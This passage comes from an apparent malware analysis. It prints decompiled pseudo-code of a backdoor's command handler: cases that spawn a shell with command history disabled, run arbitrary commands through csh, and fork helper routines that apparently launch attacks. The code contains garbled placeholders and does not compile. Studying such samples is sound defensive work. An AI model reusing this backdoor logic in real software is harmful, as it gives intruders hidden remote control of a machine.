			setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.",1);
			unsetenv("HISTFILE");
			setenv("TERM","linux",1);
			execl("/bin/sh","sh",0);
			close(var_FD);
			exit(0);		
		}
	};
	break;

case7:
	gPID = fork();
	if (gPID==0) {
		setsid()
		signal(SIGCHLD,1);
		if (fork()!=0) {sleep???(1200);kill(gPID,SIGKILL);exit(0);}//1200=20min
		for(ebx=0;ebx<=397;ebx++) var_Buf2[ebx]=var_Buf2[ebx+2];
		sprintf(&Buffer, "/bin/csh -f -c \"%s\" ",Buf2Ptr);
		??execv??(&Buffer);
		exit(0);
	}
	break;

case8:	
	if (gPID2!=0) {
		kill(gPID2,SIGKILL);
		gPID2 = 0;
	}
	break;	

case9:	
	if (gPID2==0) {
		g_LastCommand = 9;
		gPID2=fork();
		if (gPID2==0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+10..255+10];
			Fun4(buf2[2,3,4,5,6,7,8,9],&var_Buf256Bytes);
			exit(0);
		}
	}
	break;
case10:
	if (gPID2==0) {
		g_LastCommand = 9;
		gPID2=fork();
		if (gPID2==0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+14..255+14];
			Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12],0,buf2[13],&var_Buf256Bytes);
			exit(0);
		}
	}
	break;
case11:					
	if (gPID2==0) {
		g_LastCommand = 11;
		gPID2=fork();
		if (gPID2==0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+15..255+15];
			Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12,13,14],&var_Buf256Bytes);
			exit(0);
		}
	}
	break;
case 12:
	if (gPID2==0) {
		g_LastCommand = 12;
		gPID2=fork();
		if (gPID2==0) {
			var_256Bytes[0..255]=Buf2[0..255];
			var_256Bytes[0..255]=var_256Bytes[0+14..255+14];
			Fun5(buf2[2,3,4,5,6,7,8,9,10,11,12,13],&var_256Bytes);
			exit(0);
		}
	}
	break;

We can see that there are several calls to functions defined nearby (named FunN or LocFunN). We'll have to work a little bit on them. Here's a quick description of the functionality they provide;

With all that we can see part of the functionality that these "cases" provide;